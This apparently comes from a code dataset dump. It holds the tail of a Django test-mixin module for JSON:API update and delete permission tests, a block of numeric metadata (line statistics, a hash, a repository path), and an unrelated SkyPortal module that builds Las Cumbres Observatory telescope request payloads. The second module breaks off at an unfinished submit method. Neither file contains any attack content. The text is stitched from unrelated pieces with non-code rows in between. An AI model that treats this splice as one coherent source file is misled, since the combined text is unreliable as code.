        self.failure_response_structure_test(
            response, status.HTTP_401_UNAUTHORIZED)
class ResourceUpdateTestCase(object):
    """Mixin exercising the happy-path PATCH behaviour of a resource endpoint.

    Host test cases are expected to provide: ``resource``, ``resource_class``,
    ``resource_view_name``, ``attributes``, ``new_attribute_values``,
    ``patch_request_stub``, ``relationship_keys``, ``USER_ROLE``, plus the
    ``client_*_auth`` helpers and the response-structure assertions.
    """
    def get_patch_response(self, request_data):
        """PATCH ``request_data`` to the resource's detail URL as its owner (if any)."""
        # Falls back to None when the resource has no associated user.
        user_id = getattr(getattr(self.resource, 'user', None), 'id', None)
        return self.client_patch_auth(
            reverse(self.resource_view_name, args=(self.resource.id,)),
            user_role=self.USER_ROLE,
            user_id=user_id,
            company_permissions=getattr(self, 'company_permissions', {}),
            data=ujson.dumps(request_data),
            content_type='application/vnd.api+json'
        )
    def test_update__resource(self):
        """A single-attribute PATCH succeeds and is persisted to the database."""
        attribute_name = self.attributes[0]
        new_attribute_value = self.new_attribute_values[0]
        update_data = self.patch_request_stub
        update_data['data']['attributes'] = {attribute_name: new_attribute_value}
        response = self.get_patch_response(update_data)
        self.success_response_structure_test(response, status.HTTP_200_OK)
        setattr(self.resource, attribute_name, new_attribute_value)
        self.validate_instance_in_response(response, self.resource, self.attributes,
                                           relationship_keys=self.relationship_keys)
        db_obj = self.resource_class.objects.get(id=self.resource.id)
        db_value = getattr(db_obj, attribute_name)
        # Normalise the expected value so it compares against what the ORM
        # returns for temporal columns.
        if isinstance(db_value, datetime.datetime):
            new_attribute_value = dateutil.parser.parse(new_attribute_value)
        elif isinstance(db_value, datetime.date):
            # NOTE(review): this converts the expected value to an ISO string
            # while db_value stays a date/time object — presumably the host
            # fixtures make these comparable; confirm against the callers.
            new_attribute_value = new_attribute_value.isoformat()
        elif isinstance(db_value, datetime.time):
            new_attribute_value = new_attribute_value.isoformat()
        self.assertEqual(db_value, new_attribute_value)
    def test_update__incorrect_type(self):
        """PATCH with a mismatched JSON:API resource type yields 409 Conflict."""
        attribute_name = self.attributes[0]
        new_attribute_value = self.new_attribute_values[0]
        update_data = self.patch_request_stub
        update_data['data']['type'] = 'RandomType'
        update_data['data']['attributes'] = {attribute_name: new_attribute_value}
        response = self.get_patch_response(update_data)
        self.failure_response_structure_test(response, status.HTTP_409_CONFLICT)
    def test_update__multiple_fields(self):
        """Two attributes may be updated in a single PATCH; both persist."""
        # Skipped (trivially passes) when the host supplies < 2 new values.
        if len(self.new_attribute_values) < 2:
            return True
        attribute_name_1 = self.attributes[0]
        new_attribute_value_1 = self.new_attribute_values[0]
        attribute_name_2 = self.attributes[1]
        new_attribute_value_2 = self.new_attribute_values[1]
        update_data = self.patch_request_stub
        update_data['data']['attributes'] = {
            attribute_name_1: new_attribute_value_1,
            attribute_name_2: new_attribute_value_2
        }
        response = self.get_patch_response(update_data)
        setattr(self.resource, attribute_name_1, new_attribute_value_1)
        setattr(self.resource, attribute_name_2, new_attribute_value_2)
        self.success_response_structure_test(response, status.HTTP_200_OK)
        self.validate_instance_in_response(response, self.resource, self.attributes,
                                           relationship_keys=self.relationship_keys)
        db_obj = self.resource_class.objects.get(id=self.resource.id)
        self.assertEqual(getattr(db_obj, attribute_name_1), new_attribute_value_1)
        self.assertEqual(getattr(db_obj, attribute_name_2), new_attribute_value_2)
    def test_update__missing_item_404(self):
        """PATCH against an id that does not exist yields 404."""
        attribute_name = self.attributes[0]
        new_attribute_value = self.new_attribute_values[0]
        update_data = self.patch_request_stub
        update_data['data']['id'] = 12457
        update_data['data']['attributes'] = {attribute_name: new_attribute_value}
        response = self.client_patch_auth(
            reverse(self.resource_view_name, args=(12457,)),
            user_role=self.USER_ROLE,
            data=ujson.dumps(update_data),
            content_type='application/vnd.api+json'
        )
        self.failure_response_structure_test(response, status.HTTP_404_NOT_FOUND)
    def test_update__unauthorized(self):
        """An unauthenticated PATCH yields 401."""
        attribute_name = self.attributes[0]
        new_attribute_value = self.new_attribute_values[0]
        update_data = self.patch_request_stub
        update_data['data']['attributes'] = {attribute_name: new_attribute_value}
        response = self.client_patch_auth(
            reverse(self.resource_view_name, args=(self.resource.id,)),
            data=ujson.dumps(update_data),
            content_type='application/vnd.api+json'
        )
        self.failure_response_structure_test(response, status.HTTP_401_UNAUTHORIZED)
class ResourceUpdateLimitedPermissionTestCase(object):
    """Mixin asserting that PATCH attempts are denied for limited-permission roles."""
    def get_patch_response(self, request_data):
        """Issue an authenticated PATCH to the resource's detail URL."""
        owner = getattr(self.resource, 'user', None)
        return self.client_patch_auth(
            reverse(self.resource_view_name, args=(self.resource.id,)),
            user_role=self.USER_ROLE,
            user_id=getattr(owner, 'id', None),
            company_permissions=getattr(self, 'company_permissions', {}),
            data=ujson.dumps(request_data),
            content_type='application/vnd.api+json'
        )
    def test_update__resource(self):
        """A single-attribute update is forbidden."""
        payload = self.patch_request_stub
        payload['data']['attributes'] = {
            self.attributes[0]: self.new_attribute_values[0]}
        response = self.get_patch_response(payload)
        self.failure_response_structure_test(response, status.HTTP_403_FORBIDDEN)
    def test_update__incorrect_type(self):
        """Even a type-mismatched update is rejected with 403 (not 409)."""
        payload = self.patch_request_stub
        payload['data']['type'] = 'RandomType'
        payload['data']['attributes'] = {
            self.attributes[0]: self.new_attribute_values[0]}
        response = self.get_patch_response(payload)
        self.failure_response_structure_test(response, status.HTTP_403_FORBIDDEN)
    def test_update__multiple_fields(self):
        """A multi-attribute update is forbidden."""
        if len(self.new_attribute_values) < 2:
            return True
        payload = self.patch_request_stub
        payload['data']['attributes'] = {
            self.attributes[0]: self.new_attribute_values[0],
            self.attributes[1]: self.new_attribute_values[1],
        }
        response = self.get_patch_response(payload)
        self.failure_response_structure_test(response, status.HTTP_403_FORBIDDEN)
    def test_update__missing_item_404(self):
        """Updating a nonexistent resource id yields 404."""
        payload = self.patch_request_stub
        payload['data']['id'] = 12457
        payload['data']['attributes'] = {
            self.attributes[0]: self.new_attribute_values[0]}
        response = self.client_patch_auth(
            reverse(self.resource_view_name, args=(12457,)),
            user_role=self.USER_ROLE,
            data=ujson.dumps(payload),
            content_type='application/vnd.api+json'
        )
        self.failure_response_structure_test(response, status.HTTP_404_NOT_FOUND)
    def test_update__unauthorized(self):
        """An unauthenticated PATCH yields 401."""
        payload = self.patch_request_stub
        payload['data']['attributes'] = {
            self.attributes[0]: self.new_attribute_values[0]}
        response = self.client_patch_auth(
            reverse(self.resource_view_name, args=(self.resource.id,)),
            data=ujson.dumps(payload),
            content_type='application/vnd.api+json'
        )
        self.failure_response_structure_test(response, status.HTTP_401_UNAUTHORIZED)
class ResourceUpdateWithoutPermissionTestCase(ResourceUpdateLimitedPermissionTestCase):
    """No-permission variant of the limited-permission update mixin.

    The only difference is the missing-item case: with no permission at all
    the API answers 403 instead of revealing nonexistence with a 404.
    """
    def test_update__missing_item_404(self):
        """Without permission the API hides existence: expect 403, not 404."""
        payload = self.patch_request_stub
        payload['data']['id'] = 12457
        payload['data']['attributes'] = {
            self.attributes[0]: self.new_attribute_values[0]}
        response = self.client_patch_auth(
            reverse(self.resource_view_name, args=(12457,)),
            user_role=self.USER_ROLE,
            data=ujson.dumps(payload),
            content_type='application/vnd.api+json'
        )
        self.failure_response_structure_test(response, status.HTTP_403_FORBIDDEN)
class ResourceFlaggedDeleteTestCase(object):
    """Mixin for soft-delete endpoints: DELETE flags the row instead of removing it."""
    def test_resource(self):
        """DELETE returns 204 and sets deleted_at while keeping the row."""
        response = self.client_delete_auth(
            reverse(self.resource_view_name, args=(self.resource.id,)),
            user_role=self.USER_ROLE,
            company_permissions=getattr(self, 'company_permissions', {}))
        self.assertEqual(response.status_code, status.HTTP_204_NO_CONTENT)
        # The row must survive the delete, carrying a deleted_at timestamp.
        remaining = self.resource_class.objects.filter(id=self.resource.id)
        self.assertEqual(remaining.count(), 1)
        self.assertIsNotNone(remaining[0].deleted_at)
    def test_delete__404_for_nonexistant_resource(self):
        """Deleting an unknown id yields 404."""
        response = self.client_delete_auth(
            reverse(self.resource_view_name, args=(9999,)),
            user_role=self.USER_ROLE)
        self.failure_response_structure_test(response, status.HTTP_404_NOT_FOUND)
    def test_delete__unauthorized(self):
        """An unauthenticated DELETE yields 401."""
        response = self.client_delete_auth(
            reverse(self.resource_view_name, args=(self.resource.id,)))
        self.failure_response_structure_test(response, status.HTTP_401_UNAUTHORIZED)
class ResourceDeleteTestCase(object):
    """Mixin for hard-delete endpoints: DELETE removes the row outright."""
    def _assert_hard_delete(self, **auth_kwargs):
        """Delete self.resource with the given credentials and verify removal."""
        queryset = self.resource_class.objects.filter(id=self.resource.id)
        self.assertEqual(queryset.count(), 1)
        response = self.client_delete_auth(
            reverse(self.resource_view_name, args=(self.resource.id,)),
            company_permissions=getattr(self, 'company_permissions', {}),
            **auth_kwargs)
        self.assertEqual(response.status_code, status.HTTP_204_NO_CONTENT)
        self.assertEqual(
            self.resource_class.objects.filter(id=self.resource.id).count(), 0)
    def test_delete_resource__by_user(self):
        """The owning user may hard-delete the resource."""
        if not hasattr(self.resource, 'user'):
            return True
        self._assert_hard_delete(user_role=self.USER_ROLE,
                                 user_id=self.resource.user.id)
    def test_delete_resource__by_staff(self):
        """Staff may hard-delete any resource."""
        self._assert_hard_delete(user_role=STAFF)
    def test_delete__404_for_nonexistant_resource(self):
        """Deleting an unknown id yields 404."""
        response = self.client_delete_auth(
            reverse(self.resource_view_name, args=(9999,)),
            user_role=STAFF)
        self.failure_response_structure_test(response, status.HTTP_404_NOT_FOUND)
    def test_delete__unauthorized(self):
        """An unauthenticated DELETE yields 401."""
        response = self.client_delete_auth(
            reverse(self.resource_view_name, args=(self.resource.id,)))
        self.failure_response_structure_test(response, status.HTTP_401_UNAUTHORIZED)
    def test_delete__forbidden(self):
        """A plain USER role may not delete the resource."""
        response = self.client_delete_auth(
            reverse(self.resource_view_name, args=(self.resource.id,)),
            user_role=USER)
        self.failure_response_structure_test(response, status.HTTP_403_FORBIDDEN)
class ResourceNoDeleteTestCase(object):
    """Mixin for endpoints that do not support DELETE at all (always 403/401)."""
    def test_delete_resource__by_user(self):
        """Even the owning user may not delete; the row must remain."""
        if not hasattr(self.resource, 'user'):
            return True
        queryset = self.resource_class.objects.filter(id=self.resource.id)
        self.assertEqual(queryset.count(), 1)
        response = self.client_delete_auth(
            reverse(self.resource_view_name, args=(self.resource.id,)),
            user_role=self.USER_ROLE,
            user_id=self.resource.user.id)
        self.failure_response_structure_test(response, status.HTTP_403_FORBIDDEN)
    def test_delete_resource__by_staff(self):
        """The configured role may not delete either."""
        response = self.client_delete_auth(
            reverse(self.resource_view_name, args=(self.resource.id,)),
            user_role=self.USER_ROLE)
        self.failure_response_structure_test(response, status.HTTP_403_FORBIDDEN)
    def test_delete__for_nonexistant_resource(self):
        """Unknown ids are also answered with 403, never 404."""
        response = self.client_delete_auth(
            reverse(self.resource_view_name, args=(9999,)),
            user_role=self.USER_ROLE)
        self.failure_response_structure_test(response, status.HTTP_403_FORBIDDEN)
    def test_delete__unauthorized(self):
        """An unauthenticated DELETE yields 401."""
        response = self.client_delete_auth(
            reverse(self.resource_view_name, args=(self.resource.id,)))
        self.failure_response_structure_test(response, status.HTTP_401_UNAUTHORIZED)
    def test_delete__forbidden(self):
        """An authenticated DELETE with the configured role yields 403."""
        response = self.client_delete_auth(
            reverse(self.resource_view_name, args=(self.resource.id,)),
            user_role=self.USER_ROLE)
        self.failure_response_structure_test(response, status.HTTP_403_FORBIDDEN)
class ResourceDeleteWithoutPermissionTestCase(ResourceNoDeleteTestCase):
    """No-permission variant: inherits every expectation (403/401 on all
    delete paths) unchanged from ResourceNoDeleteTestCase."""
    pass
class ResourceDeleteLimitedTestCase(ResourceNoDeleteTestCase):
    """Limited-permission variant: unknown ids are revealed as 404 rather than 403."""
    def test_delete__for_nonexistant_resource(self):
        """With limited (but some) permission the API reports 404 for unknown ids."""
        response = self.client_delete_auth(
            reverse(self.resource_view_name, args=(9999,)),
            user_role=self.USER_ROLE)
        self.failure_response_structure_test(response, status.HTTP_404_NOT_FOUND)
| 40.28023
| 114
| 0.700801
| 2,538
| 20,986
| 5.418046
| 0.066588
| 0.067195
| 0.046978
| 0.075922
| 0.932587
| 0.920224
| 0.920224
| 0.898262
| 0.898262
| 0.896953
| 0
| 0.015252
| 0.209568
| 20,986
| 520
| 115
| 40.357692
| 0.813721
| 0.00872
| 0
| 0.864789
| 0
| 0
| 0.049187
| 0.021925
| 0
| 0
| 0
| 0
| 0.03662
| 1
| 0.115493
| false
| 0.002817
| 0.019718
| 0
| 0.197183
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
b180d1f8b2ee3a8671147b7174fd61649ac75c2e
| 31,365
|
py
|
Python
|
skyportal/facility_apis/lco.py
|
bparazin/skyportal
|
c160610ca0cc28eef9f36c2d11cc15bd9bcbfe56
|
[
"BSD-3-Clause"
] | 52
|
2018-11-02T00:53:21.000Z
|
2022-03-08T16:03:52.000Z
|
skyportal/facility_apis/lco.py
|
bparazin/skyportal
|
c160610ca0cc28eef9f36c2d11cc15bd9bcbfe56
|
[
"BSD-3-Clause"
] | 1,944
|
2017-04-27T18:51:20.000Z
|
2022-03-31T20:17:44.000Z
|
skyportal/facility_apis/lco.py
|
bparazin/skyportal
|
c160610ca0cc28eef9f36c2d11cc15bd9bcbfe56
|
[
"BSD-3-Clause"
] | 63
|
2017-05-13T01:40:47.000Z
|
2022-03-12T11:32:11.000Z
|
import json
import requests
from datetime import datetime, timedelta
from . import FollowUpAPI
from baselayer.app.env import load_env
from ..utils import http
env, cfg = load_env()
# Base URL of the LCO observation-portal request-group API, assembled from
# the app's configured protocol, host, and port.
requestpath = f"{cfg['app.lco_protocol']}://{cfg['app.lco_host']}:{cfg['app.lco_port']}/api/requestgroups/"
class SINISTRORequest:
    """A JSON structure for LCO 1m SINISTRO requests."""
    def __init__(self, request):
        """Initialize SINISTRO request.

        Parameters
        ----------
        request: skyportal.models.FollowupRequest
            The request to add to the queue and the SkyPortal database.
        """
        self.requestgroup = self._build_payload(request)
    def _build_payload(self, request):
        """Payload json for LCO 1m SINISTRO queue requests.

        Parameters
        ----------
        request: skyportal.models.FollowupRequest
            The request to add to the queue and the SkyPortal database.

        Returns
        ----------
        payload: json
            payload for requests.
        """
        # Constraints used for scheduling this observation.
        # Fix: honour the minimum_lunar_distance collected (and required) by
        # the SINISTRO form, as the SPECTRAL/MUSCAT/FLOYDS builders already
        # do, instead of hard-coding 30; 30 deg remains the fallback for
        # older payloads that lack the key.
        constraints = {
            'max_airmass': request.payload["maximum_airmass"],
            'min_lunar_distance': request.payload.get(
                "minimum_lunar_distance", 30
            ),
        }
        # The target of the observation
        target = {
            'name': request.obj.id,
            'type': 'ICRS',
            'ra': request.obj.ra,
            'dec': request.obj.dec,
            'epoch': 2000,
        }
        exp_time = request.payload["exposure_time"]
        exp_count = int(request.payload["exposure_counts"])
        # One EXPOSE configuration per requested filter.
        configurations = []
        for filt in request.payload['observation_choices']:
            configurations.append(
                {
                    'type': 'EXPOSE',
                    'instrument_type': '1M0-SCICAM-SINISTRO',
                    'constraints': constraints,
                    'target': target,
                    'acquisition_config': {},
                    'guiding_config': {},
                    'instrument_configs': [
                        {
                            'exposure_time': exp_time,
                            'exposure_count': exp_count,
                            'optical_elements': {'filter': '%s' % filt},
                        }
                    ],
                }
            )
        # Observing window spanning the requested date range (midnight UT).
        tstart = request.payload["start_date"] + ' 00:00:00'
        tend = request.payload["end_date"] + ' 00:00:00'
        windows = [{'start': tstart, 'end': tend}]
        # The telescope class that should be used for this observation
        location = {'telescope_class': '1m0'}
        altdata = request.allocation.altdata
        # The full RequestGroup, with additional meta-data
        requestgroup = {
            'name': '%s' % (request.obj.id),  # The title
            'proposal': altdata["PROPOSAL_ID"],
            'ipp_value': request.payload["priority"],
            'operator': 'SINGLE',
            'observation_type': 'NORMAL',
            'requests': [
                {
                    'configurations': configurations,
                    'windows': windows,
                    'location': location,
                }
            ],
        }
        return requestgroup
class SPECTRALRequest:
    """A JSON structure for LCO 2m SPECTRAL requests."""
    def __init__(self, request):
        """Build and store the request-group payload for *request*.

        Parameters
        ----------
        request: skyportal.models.FollowupRequest
            The request to add to the queue and the SkyPortal database.
        """
        self.requestgroup = self._build_payload(request)
    def _build_payload(self, request):
        """Assemble the LCO 2m SPECTRAL request-group dictionary.

        Parameters
        ----------
        request: skyportal.models.FollowupRequest
            The request to add to the queue and the SkyPortal database.

        Returns
        ----------
        payload: json
            payload for requests.

        Raises
        ------
        ValueError
            If the target declination is north of +17 deg.
        """
        if request.obj.dec > 17:
            raise ValueError('Spectral only available in South.')
        payload = request.payload
        # Scheduling constraints for this observation.
        constraints = {
            'max_airmass': payload["maximum_airmass"],
            'min_lunar_distance': payload["minimum_lunar_distance"],
        }
        # Fixed ICRS target taken from the followed-up object.
        target = {
            'name': request.obj.id,
            'type': 'ICRS',
            'ra': request.obj.ra,
            'dec': request.obj.dec,
            'epoch': 2000,
        }
        exp_time = payload["exposure_time"]
        exp_count = int(payload["exposure_counts"])
        # One EXPOSE configuration per requested filter.
        configurations = [
            {
                'type': 'EXPOSE',
                'instrument_type': '2M0-SCICAM-SPECTRAL',
                'constraints': constraints,
                'target': target,
                'acquisition_config': {},
                'guiding_config': {},
                'instrument_configs': [
                    {
                        'exposure_time': exp_time,
                        'exposure_count': exp_count,
                        'optical_elements': {'filter': '%s' % filt},
                    }
                ],
            }
            for filt in payload['observation_choices']
        ]
        # Observing window spanning the requested date range (midnight UT).
        windows = [
            {
                'start': payload["start_date"] + ' 00:00:00',
                'end': payload["end_date"] + ' 00:00:00',
            }
        ]
        # The 2m telescope class hosts SPECTRAL.
        location = {'telescope_class': '2m0'}
        altdata = request.allocation.altdata
        # The full RequestGroup, with additional meta-data.
        return {
            'name': '%s' % (request.obj.id),  # The title
            'proposal': altdata["PROPOSAL_ID"],
            'ipp_value': payload["priority"],
            'operator': 'SINGLE',
            'observation_type': 'NORMAL',
            'requests': [
                {
                    'configurations': configurations,
                    'windows': windows,
                    'location': location,
                }
            ],
        }
class MUSCATRequest:
    """A JSON structure for LCO 2m MUSCAT requests."""
    def __init__(self, request):
        """Initialize MUSCAT request.

        Parameters
        ----------
        request: skyportal.models.FollowupRequest
            The request to add to the queue and the SkyPortal database.
        """
        self.requestgroup = self._build_payload(request)
    def _build_payload(self, request):
        """Payload json for LCO 2m MUSCAT queue requests.

        Parameters
        ----------
        request: skyportal.models.FollowupRequest
            The request to add to the queue and the SkyPortal database.

        Returns
        ----------
        payload: json
            payload for requests.
        """
        # Constraints used for scheduling this observation
        constraints = {
            'max_airmass': request.payload["maximum_airmass"],
            'min_lunar_distance': request.payload["minimum_lunar_distance"],
        }
        # The target of the observation
        target = {
            'name': request.obj.id,
            'type': 'ICRS',
            'ra': request.obj.ra,
            'dec': request.obj.dec,
            'epoch': 2000,
        }
        exp_time = request.payload["exposure_time"]
        exp_count = int(request.payload["exposure_counts"])
        # Single EXPOSE configuration: the same exposure time is applied to
        # all four MUSCAT channels (g/r/i/z), exposed synchronously, with
        # every diffuser moved out of the beam.
        configurations = [
            {
                'type': 'EXPOSE',
                'instrument_type': '2M0-SCICAM-MUSCAT',
                'target': target,
                'constraints': constraints,
                'acquisition_config': {},
                'guiding_config': {},
                'instrument_configs': [
                    {
                        'exposure_time': exp_time,
                        'exposure_count': exp_count,
                        'optical_elements': {
                            'diffuser_g_position': 'out',
                            'diffuser_r_position': 'out',
                            'diffuser_i_position': 'out',
                            'diffuser_z_position': 'out',
                        },
                        'extra_params': {
                            'exposure_mode': 'SYNCHRONOUS',
                            'exposure_time_g': exp_time,
                            'exposure_time_r': exp_time,
                            'exposure_time_i': exp_time,
                            'exposure_time_z': exp_time,
                        },
                    }
                ],
            }
        ]
        # Observing window spanning the requested date range (midnight UT).
        tstart = request.payload["start_date"] + ' 00:00:00'
        tend = request.payload["end_date"] + ' 00:00:00'
        windows = [{'start': tstart, 'end': tend}]
        # The telescope class that should be used for this observation
        location = {'telescope_class': '2m0'}
        altdata = request.allocation.altdata
        # The full RequestGroup, with additional meta-data
        requestgroup = {
            'name': '%s' % (request.obj.id),  # The title
            'proposal': altdata["PROPOSAL_ID"],
            'ipp_value': request.payload["priority"],
            'operator': 'SINGLE',
            'observation_type': 'NORMAL',
            'requests': [
                {
                    'configurations': configurations,
                    'windows': windows,
                    'location': location,
                }
            ],
        }
        return requestgroup
class FLOYDSRequest:
    """A JSON structure for LCO 2m FLOYDS requests."""
    def __init__(self, request):
        """Initialize FLOYDS request.

        Parameters
        ----------
        request: skyportal.models.FollowupRequest
            The request to add to the queue and the SkyPortal database.
        """
        self.requestgroup = self._build_payload(request)
    def _build_payload(self, request):
        """Payload header for LCO 2m FLOYDS queue requests.

        Parameters
        ----------
        request: skyportal.models.FollowupRequest
            The request to add to the queue and the SkyPortal database.

        Returns
        ----------
        payload: json
            payload for requests.
        """
        # Constraints used for scheduling this observation
        constraints = {
            'max_airmass': request.payload["maximum_airmass"],
            'min_lunar_distance': request.payload["minimum_lunar_distance"],
        }
        # The target of the observation
        target = {
            'name': request.obj.id,
            'type': 'ICRS',
            'ra': request.obj.ra,
            'dec': request.obj.dec,
            'epoch': 2000,
        }
        # The telescope class that should be used for this observation
        location = {'telescope_class': '2m0'}
        exp_time = request.payload["exposure_time"]
        exp_count = int(request.payload["exposure_counts"])
        # The science SPECTRUM exposure is bracketed by calibrations:
        # LAMP_FLAT + ARC before it and ARC + LAMP_FLAT after it, all with
        # the same 1.6" slit and fixed calibration exposure times.
        configurations = [
            # Pre-science flat-field calibration (guiding off).
            {
                'type': 'LAMP_FLAT',
                'instrument_type': '2M0-FLOYDS-SCICAM',
                'constraints': constraints,
                'target': target,
                'acquisition_config': {},
                'guiding_config': {'mode': 'OFF', 'optional': False},
                'instrument_configs': [
                    {
                        'exposure_time': 50,
                        'exposure_count': 1,
                        'rotator_mode': 'VFLOAT',
                        'optical_elements': {'slit': 'slit_1.6as'},
                    }
                ],
            },
            # Pre-science wavelength-calibration arc.
            {
                'type': 'ARC',
                'instrument_type': '2M0-FLOYDS-SCICAM',
                'constraints': constraints,
                'target': target,
                'acquisition_config': {},
                'guiding_config': {'mode': 'OFF', 'optional': False},
                'instrument_configs': [
                    {
                        'exposure_time': 60,
                        'exposure_count': 1,
                        'rotator_mode': 'VFLOAT',
                        'optical_elements': {'slit': 'slit_1.6as'},
                    }
                ],
            },
            # The science spectrum itself, with WCS acquisition and guiding on.
            {
                'type': 'SPECTRUM',
                'instrument_type': '2M0-FLOYDS-SCICAM',
                'constraints': constraints,
                'target': target,
                'acquisition_config': {'mode': 'WCS'},
                'guiding_config': {'mode': 'ON', 'optional': False},
                'instrument_configs': [
                    {
                        'exposure_time': exp_time,
                        'exposure_count': exp_count,
                        'rotator_mode': 'VFLOAT',
                        'optical_elements': {'slit': 'slit_1.6as'},
                    }
                ],
            },
            # Post-science arc.
            {
                'type': 'ARC',
                'instrument_type': '2M0-FLOYDS-SCICAM',
                'constraints': constraints,
                'target': target,
                'acquisition_config': {},
                'guiding_config': {'mode': 'OFF', 'optional': False},
                'instrument_configs': [
                    {
                        'exposure_time': 60,
                        'exposure_count': 1,
                        'rotator_mode': 'VFLOAT',
                        'optical_elements': {'slit': 'slit_1.6as'},
                    }
                ],
            },
            # Post-science flat-field calibration.
            {
                'type': 'LAMP_FLAT',
                'instrument_type': '2M0-FLOYDS-SCICAM',
                'constraints': constraints,
                'target': target,
                'acquisition_config': {},
                'guiding_config': {'mode': 'OFF', 'optional': False},
                'instrument_configs': [
                    {
                        'exposure_time': 50,
                        'exposure_count': 1,
                        'rotator_mode': 'VFLOAT',
                        'optical_elements': {'slit': 'slit_1.6as'},
                    }
                ],
            },
        ]
        # Observing window spanning the requested date range (midnight UT).
        tstart = request.payload["start_date"] + ' 00:00:00'
        tend = request.payload["end_date"] + ' 00:00:00'
        windows = [{'start': tstart, 'end': tend}]
        altdata = request.allocation.altdata
        # The full RequestGroup, with additional meta-data
        requestgroup = {
            'name': '%s' % (request.obj.id),  # The title
            'proposal': altdata["PROPOSAL_ID"],
            'ipp_value': request.payload["priority"],
            'operator': 'SINGLE',
            'observation_type': 'NORMAL',
            'requests': [
                {
                    'configurations': configurations,
                    'windows': windows,
                    'location': location,
                }
            ],
        }
        return requestgroup
class LCOAPI(FollowUpAPI):
    """An interface to LCO operations."""
    @staticmethod
    def delete(request):
        """Delete a follow-up request from LCO queue (all instruments).

        Parameters
        ----------
        request: skyportal.models.FollowupRequest
            The request to delete from the queue and the SkyPortal database.
        """
        from ..models import DBSession, FollowupRequest, FacilityTransaction
        req = (
            DBSession()
            .query(FollowupRequest)
            .filter(FollowupRequest.id == request.id)
            .one()
        )
        altdata = request.allocation.altdata
        if not altdata:
            raise ValueError('Missing allocation information.')
        # The LCO request-group id was recorded in the submission
        # transaction's response body.
        # NOTE(review): assumes at least one transaction exists; update()
        # guards the failed-submission (no-transaction) case but delete()
        # does not — confirm deletes cannot be issued for failed submissions.
        content = req.transactions[0].response["content"]
        content = json.loads(content)
        uid = content["id"]
        r = requests.post(
            f"{requestpath}{uid}/cancel/",
            headers={"Authorization": f'Token {altdata["API_TOKEN"]}'},
        )
        r.raise_for_status()
        request.status = "deleted"
        transaction = FacilityTransaction(
            request=http.serialize_requests_request(r.request),
            response=http.serialize_requests_response(r),
            followup_request=request,
            initiator_id=request.last_modified_by_id,
        )
        DBSession().add(transaction)
    @staticmethod
    def update(request):
        """Update a follow-up request from LCO queue (all instruments).

        Parameters
        ----------
        request: skyportal.models.FollowupRequest
            The request to update from the queue and the SkyPortal database.
        """
        from ..models import DBSession, FollowupRequest, FacilityTransaction
        req = (
            DBSession()
            .query(FollowupRequest)
            .filter(FollowupRequest.id == request.id)
            .one()
        )
        # this happens for failed submissions
        # just go ahead and delete
        if len(req.transactions) == 0:
            DBSession().query(FollowupRequest).filter(
                FollowupRequest.id == request.id
            ).delete()
            DBSession().commit()
            return
        altdata = request.allocation.altdata
        if not altdata:
            raise ValueError('Missing allocation information.')
        # Recover the LCO request-group id from the submission transaction.
        content = req.transactions[0].response["content"]
        content = json.loads(content)
        uid = content["id"]
        r = requests.get(
            f"{requestpath}{uid}/",
            headers={"Authorization": f'Token {altdata["API_TOKEN"]}'},
        )
        r.raise_for_status()
        # Bug fix: inspect the state reported by the *fresh* GET response,
        # not the stale stored submission transaction (which was re-read
        # here before and could never report a later COMPLETED state).
        current = r.json()
        if current["state"] == "COMPLETED":
            request.status = "complete"
        transaction = FacilityTransaction(
            request=http.serialize_requests_request(r.request),
            response=http.serialize_requests_response(r),
            followup_request=request,
            initiator_id=request.last_modified_by_id,
        )
        DBSession().add(transaction)
class SINISTROAPI(LCOAPI):
    """An interface to LCO SINISTRO operations."""
    # subclasses *must* implement the method below
    @staticmethod
    def submit(request):
        """Submit a follow-up request to LCO's SINISTRO.

        Parameters
        ----------
        request: skyportal.models.FollowupRequest
            The request to add to the queue and the SkyPortal database.
        """
        from ..models import FacilityTransaction, DBSession
        altdata = request.allocation.altdata
        if not altdata:
            raise ValueError('Missing allocation information.')
        lcoreq = SINISTRORequest(request)
        requestgroup = lcoreq.requestgroup
        r = requests.post(
            requestpath,
            headers={"Authorization": f'Token {altdata["API_TOKEN"]}'},
            json=requestgroup,  # Make sure you use json!
        )
        # NOTE(review): raise_for_status() fires before the status check, so
        # the 'rejected' branch below is only reachable for non-201 success
        # codes; 4xx/5xx propagate as exceptions — confirm this is intended.
        r.raise_for_status()
        if r.status_code == 201:
            request.status = 'submitted'
        else:
            request.status = f'rejected: {r.content}'
        transaction = FacilityTransaction(
            request=http.serialize_requests_request(r.request),
            response=http.serialize_requests_response(r),
            followup_request=request,
            initiator_id=request.last_modified_by_id,
        )
        DBSession().add(transaction)
    # JSON schema driving the follow-up request form.
    # NOTE: the date defaults are evaluated once at import time, not per view.
    form_json_schema = {
        "type": "object",
        "properties": {
            "observation_choices": {
                "type": "array",
                "title": "Desired Observations",
                "items": {"type": "string", "enum": ["gp", "rp", "ip", "zs", "Y"]},
                "uniqueItems": True,
                "minItems": 1,
            },
            "exposure_time": {
                "title": "Exposure Time [s]",
                "type": "number",
                "default": 300.0,
            },
            "exposure_counts": {
                "title": "Exposure Counts",
                "type": "number",
                "default": 1,
            },
            "start_date": {
                "type": "string",
                "format": "date",
                "default": datetime.utcnow().date().isoformat(),
                "title": "Start Date (UT)",
            },
            "end_date": {
                "type": "string",
                "format": "date",
                "title": "End Date (UT)",
                "default": (datetime.utcnow().date() + timedelta(days=7)).isoformat(),
            },
            "maximum_airmass": {
                "title": "Maximum Airmass (1-3)",
                "type": "number",
                "default": 2.0,
                "minimum": 1,
                "maximum": 3,
            },
            "minimum_lunar_distance": {
                # Fixed label: this field is the lunar-distance constraint,
                # not a seeing limit (previous title was a copy-paste error).
                "title": "Minimum Lunar Distance [deg] (0-180)",
                "type": "number",
                "default": 30.0,
                "minimum": 0,
                "maximum": 180,
            },
            "priority": {
                "title": "IPP (0-2)",
                "type": "number",
                "default": 1.0,
                "minimum": 0,
                "maximum": 2,
            },
        },
        "required": [
            "start_date",
            "end_date",
            "maximum_airmass",
            "minimum_lunar_distance",
            "priority",
        ],
    }
    ui_json_schema = {"observation_choices": {"ui:widget": "checkboxes"}}
class SPECTRALAPI(LCOAPI):
    """An interface to LCO SPECTRAL operations."""
    # subclasses *must* implement the method below
    @staticmethod
    def submit(request):
